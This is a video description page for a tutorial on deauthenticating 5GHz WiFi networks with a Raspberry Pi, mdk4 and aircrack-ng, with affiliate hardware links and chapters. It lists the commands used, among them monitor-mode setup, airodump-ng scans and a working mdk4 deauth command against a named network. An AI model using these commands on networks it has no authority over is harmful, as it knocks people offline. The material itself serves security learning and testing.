MENU

Fun & Interesting

Deauth 5GHz WiFi using mdk4 & aircrack-ng

spacehuhn 84,941 lượt xem 3 years ago
Video Not Working? Fix It Now

Written tutorial: https://blog.spacehuhn.com/5ghz-deauther/
See all the links 👇

MDK4: https://github.com/aircrack-ng/mdk4
Nexmon: https://github.com/seemoo-lab/nexmon
Nexmon raspi tutorial: https://pimylifeup.com/raspberry-pi-nexmon/
RTL8812AU Driver: https://github.com/aircrack-ng/rtl8812au

### Go shopping (affiliate links): ###
* RTL8812AU cards:
https://s.click.aliexpress.com/e/_9iKln5
https://amzn.to/3u2xWRU
* ALFA WiFi adapter I recommend (AWUS036AC):
https://amzn.to/3u62Ngo
* Alternative model with the same chip (AWUS036ACH):
https://amzn.to/3DG3mko
* Card I used (AWUS052NH) good luck finding it lol:
https://amzn.to/3DB7Usa

### Commands I used in this video: ###

Install mdk4: sudo apt install mdk4
Check WiFi interfaces: sudo airmon-ng
Enable monitor mode: sudo airmon-ng start wlan1
Scan for WiFi devices: sudo airodump-ng wlan1mon
Scan on 5GHz: sudo airodump-ng wlan1mon --band a
Scan on Channel 44: sudo airodump-ng wlan1mon --band a --channel 44
Deauth network: sudo mdk4 wlan1mon d -E spacehuhn5ghz

Install rtl8812au driver:
Install dkms: sudo apt install dkms
Download git project: git clone https://github.com/aircrack-ng/rtl8812au.git
Open downloaded folder: cd rtl8812au
Install driver: sudo make dkms_install

Enable monitor mode on rtl8812au:
sudo ifconfig wlan1 down
sudo iwconfig wlan1 mode monitor
sudo ifconfig wlan1 up

Scan for WiFi devices: sudo airodump-ng wlan1

### Chapters ###
00:00 Intro
00:11 2.4GHz vs 5GHz
00:42 Hardware
02:18 Installing Raspberrypi OS
03:27 Starting Raspberrypi
04:12 Installing mdk4
05:17 Tips for getting the correct WiFi adapter
07:36 RTL8812AU Tutorial
10:00 Scan for WiFi devices
11:52 Deauth a 5GHz network
13:48 Outro

📡 ESP8266 Deauther: https://github.com/SpacehuhnTech/esp8266_deauther
🌍 Website: https://spacehuhn.com/
📝 Blog: https://blog.spacehuhn.com/
❤️ Donations: https://ko-fi.com/spacehuhn
🐙 Github: https://github.com/SpacehuhnTech

Comment